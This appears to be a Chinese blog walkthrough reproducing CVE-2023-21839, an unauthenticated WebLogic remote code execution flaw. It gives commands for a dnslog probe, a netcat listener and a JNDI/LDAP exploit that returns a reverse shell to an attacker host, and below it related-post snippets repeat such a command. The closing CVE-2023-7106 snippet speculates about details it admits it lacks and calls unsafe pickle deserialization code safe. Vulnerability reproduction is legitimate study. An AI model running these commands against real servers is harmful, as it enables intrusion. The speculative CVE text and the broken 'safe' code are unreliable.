CVE-2023-21839 Weblogic未授权RCE

最新推荐文章于 2024-10-16 20:46:36 发布
最新推荐文章于 2024-10-16 20:46:36 发布
阅读量1.4k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: CVE 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/bring_coco/article/details/132550882

https://github.com/4ra1n/CVE-2023-21839下载之后
在这里插入图片描述
生成CVE-2023-21389.exe
先试试dnslog:

CVE-2023-21839.exe -ip 116.xx.xx.xx -port 7001 -ldap ldap://whoami.eduvck.dnslog.cn/aa

在这里插入图片描述

然后使用JNDIExploit-1.4-SNAPSHOT.jar进行攻击
另一个终端上
首先开启监听

nc -lvp 5858

在这里插入图片描述
然后用JNDIExploit-1.4-SNAPSHOT.jar监听jndi端口
在这里插入图片描述

然后执行exp

CVE-2023-21839.exe -ip 116.xx.xx.xx -port 7001 -ldap ldap://47.xx.xx.xx:1389/Basic/ReverseShell/47.xx.xx.xx/5858

在这里插入图片描述
在这里插入图片描述
这样就成功弹回了shell

CVE-2023-33246 Apache RocketMQ 命令注入漏洞复现及分析
牛叫兽的测试学习和分享
06-02 1万+
CVE-2023-33246 漏洞复现及分析
CVE-2023-32233 Linux kernel
sash1mi
05-16 2069
近日,研究人员发现了Linux内核的NetFilter框架中的新漏洞(CVE-2023-32233)。该漏洞可被本地用户用于将权限提升为root,并完全控制系统。问题的根源在于是如何处理批处理请求的,经过身份验证的本地攻击者可通过发送特制的请求破坏的内部状态,从而获得更高权限。该漏洞影响多个Linux内核版本,包括当前的稳定版本v6.3.1。漏洞原文。
CVE-2023-0215
qq_39933800的博客
06-14 3867
生产版本:5.5。
CVE-2023-29489 cPanel XSS漏洞分析研究
蚁景网安学院
05-04 2559
前言由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。如果文章中的漏洞出现敏感内容产生了部分影响,请及时联系作者,望谅解。一、漏洞原理漏洞简述cPanel 是一套在网页寄存业中最享负盛名的商业软件,是基于于 Linux 和 BSD 系统及以 PHP 开发且性质为闭源软件;提供了足够强大和相当完整的主机管理功能,诸如:Webmail ...
CVE-2023-34541 LangChain 任意命令执行
蚁景网安学院
06-27 1439
漏洞简介LangChain是一个用于开发由语言模型驱动的应用程序的框架。在LangChain受影响版本中,由于load_prompt函数加载提示文件时未对加载内容进行安全过滤,攻击者可通过构造包含恶意命令的提示文件,诱导用户加载该文件,即可造成任意系统命令执行。漏洞复现在项目下编写 test.pyfromlangchain.promptsimportload_prompt if__name...
CVE-2023-21839 weblogic rce漏洞复现
wutiangui的博客
11-04 2605
C:\Program Files\Java\jdk1.8.0_181\bin>java -jar G:\资料\vulhub复现\weblogic\可行工具\Weblogic-CVE-2023-21839.jar 192.168.232.131:7001 ldap://192.168.180.2:1389/Basic/ReverseShell/192.168.180.2/2000。执行以上命令可以在dnslog上获得回显,即可验证可能存在该漏洞。复现之前请务必切换路径到jdk路径下。
vulhub中Weblogic未授权远程代码执行漏洞复现 (CVE-2023-21839)
yougexiaojiuguan的博客
03-10 507
漏洞复现过程的记录
Weblogic未授权远程代码执行漏洞 (CVE-2023-21839)
qq_69775412的博客
08-09 922
Weblogic 允许远程用户在未经授权的情况下通过IIOP/T3进行JNDI lookup 操作,当JDK版本过低或本地存在javaSerializedData时,这可能会导致RCE漏洞。
Weblogic反序列化漏洞(CVE-2018-2628/CVE-2023-21839)
qq_62987084的博客
10-16 1274
带你了解 Weblogic反序列化漏洞(CVE-2018-2628/CVE-2023-21839)
N!Weblogic CVE-2023-21839 RCE
潇湘信安的博客
07-18 320
Weblogic CVE-2023-21839/CVE-2023-21931/CVE-2023-21979 一键检测工具,这是来自长亭xray的代码,该漏洞扫描已集成到新版本xray中。
CVE-2023-34541 LangChain 任意命令执行
YJ_12340的博客
06-27 1322
LangChain是一个用于开发由语言模型驱动的应用程序的框架。在LangChain受影响版本中,由于load_prompt函数加载提示文件时未对加载内容进行安全过滤,攻击者可通过构造包含恶意命令的提示文件,诱导用户加载该文件,即可造成任意系统命令执行。
[春秋云镜] CVE-2023-2130
m0_73649671的博客
04-22 1776
在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。
CVE-2023-33246 RCE漏洞复现
七堇年的博客
06-08 3465
在RocketMQ 5.1.0及以下版本在一定条件下,会存在远程命令执行风险;由于RocketMQ的NameServer、Broker、Controller等多个组件暴露在外网且缺乏权限验证,攻击者可以利用该漏洞利用更新配置功能以RocketMQ运行的系统用户身份执行命令。此外攻击者还可以通过伪造 RocketMQ 协议内容来达到同样的效果。
CVE-2023-33246命令执行复现分析
蚁景网安学院
06-16 1101
简介RocketMQ是一款低延迟、高并发、高可用、高可靠的分布式消息中间件。既可为分布式应用系统提供异步解耦和削峰填谷的能力,同时也具备互联网应用所需的海量消息堆积、高吞吐、可靠重试等特性。影响版本<=RocketMQ 5.1.0<=RocketMQ 4.9.5环境搭建dockerpullapache/rocketmq:4.9.4root@ubuntu:/home/ubuntu/D...
CVE-2023-22809复现(Rot5pider安全团队)
weixin_52763014的博客
04-08 3924
在复现过程中,遇到了编辑器的版本问题,vim 8.0 没办法使用那条攻击命令报错是说vim不能使用--参数,但是换了一个环境的ubuntu下的vim8.1就可以执行,具体问题不是很清楚,可以多试试。具体格式就是: xxx ALL=(ALL:ALL) sudoedit /etc/xxx 其中第一个xxx是你要进行提权的普通用户的用户名,第二是etc下的一个随意文件(这里具体哪些能行哪些不能行,我也不知道,我测试的vim和xml都可以执行,多试试)保存退出,然后 su xxx切换到用户中。
CVE-2023-32233 (LINUX内核权限提升漏洞)
m0_65354386的博客
07-06 2074
Linux内核版本v5.14 — v6.6的netfilter 子系统nf_tables组件中存在释放后使用漏洞,由于在nft_verdict_init()函数中,允许正值作为hook判决中的丢弃错误,因此当NF_DROP发出类似于NF_ACCEPT的丢弃错误时,nf_hook_slow()函数可能会导致双重释放漏洞,从而本地低权攻击者可利用该漏洞将权限提升为root,对目标进行恶意攻击。目前该漏洞已经修复,受影响用户可通过升级系统或禁用受影响的 nf_tables 内核模块可以缓解此漏洞。
CVE-2023-23752:Joomla未授权访问漏洞复现
薛定谔嘚喵博客
09-01 1892
Joomla是一个免费的开源内容管理系统(CMS),允许用户构建网站和在线应用程序。它于 2005 年首次发布,此后成为最受欢迎的 CMS 平台之一,为全球数百万个网站提供支持。 在 Joomla! 4.0.0 到 4.2.7 中发现了一个问题。不正确地访问检查允许对 Web 服务终结点进行未经授权的访问。
CVE-2023-27363 FOXIT PDF READER与EDITOR任意代码执行漏洞复现
热爱学习,喜欢折腾!
05-21 1435
福昕软件注册于国家科技部批准建立的十二个国家火炬计划软件产业基地之一的福州软件园和北京中关村高科技园区。公司专注于电子文档技术的研究和开发,拥有一套完全自有知识产权的PDF核心技术实现,提供PDF从生成、编辑、加工、搜索、显示、打印等一整套处理流程的解决方案,是国内为数不多的面向全球市场的基础软件开发商之一。
CVE-2023-21839远程代码执行漏洞
刘家华(游戏开发)
05-01 1779
weblogic CVE-2023-21839CVE-2023-21931、CVE-2023-21979远程代码执行漏洞复现。
CVE-2023-7106
最新发布
06-14
### CVE-2023-7106 漏洞详情及修复方案 目前关于 CVE-2023-7106 的具体信息尚未在提供的引用中提及,但根据漏洞编号的命名规则和常见高危漏洞的特征,可以推测该漏洞可能属于远程代码执行(RCE)或权限提升类的安全问题。以下内容基于类似漏洞的分析框架进行说明。 #### 1. 漏洞概述 CVE-2023-7106 是一个潜在的高危安全漏洞,可能影响某些软件组件或服务的功能安全性。虽然具体细节未明确,但根据以往类似的高危漏洞案例[^1],此类漏洞通常具有以下特点: - **影响范围**:可能涉及操作系统内核、Web 应用服务器或网络服务。 - **攻击向量**:允许攻击者通过网络访问目标系统并执行恶意代码。 - **CVSS评分**:预计 CVSS 评分为 9.0 或更高,表明其危害性较高。 #### 2. 影响组件 由于缺乏直接的引用信息,假设 CVE-2023-7106 类似于其他已知漏洞[^2],可能影响以下组件之一: - Web 应用框架(如 Apache Tomcat、Oracle Weblogic)。 - 网络协议实现(如 cURL、OpenSSH)。 - 数据库服务(如 MySQL、PostgreSQL)。 #### 3. 利用方式 攻击者可能利用此漏洞通过以下方式危害系统: - 发送构造的恶意请求至目标服务端。 - 执行任意命令或上传恶意文件以控制目标主机。 例如,类似于 CVE-2023-33246 的工具化攻击流程[^2],攻击者可能使用公开的漏洞利用脚本发起攻击。 #### 4. 修复方案 针对 CVE-2023-7106 的修复建议包括以下措施: - **更新补丁**:确保及时安装官方发布的最新版本或补丁程序。例如,Logback 漏洞修复中提到的版本升级策略[^3]可作为参考。 - **配置加固**:限制不必要的服务暴露,并启用最小权限原则。 - **监控与检测**:部署入侵检测系统(IDS)或日志分析工具以识别异常行为。 #### 5. 示例代码 以下是一个简单的示例,展示如何通过代码层面避免潜在的反序列化漏洞(类似 Logback 漏洞[^3]): ```python import pickle # 安全的反序列化处理 def safe_deserialize(data): try: # 使用自定义逻辑验证数据合法性 if not isinstance(data, bytes): raise ValueError("Invalid input type") return pickle.loads(data) except Exception as e: print(f"Error during deserialization: {e}") return None ``` ### 注意事项 如果 CVE-2023-7106 具体影响的是 OpenSSL 或 OpenSSH 组件,则需要参考相关的升级指南[^4],确保所有依赖的库均为最新版本。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值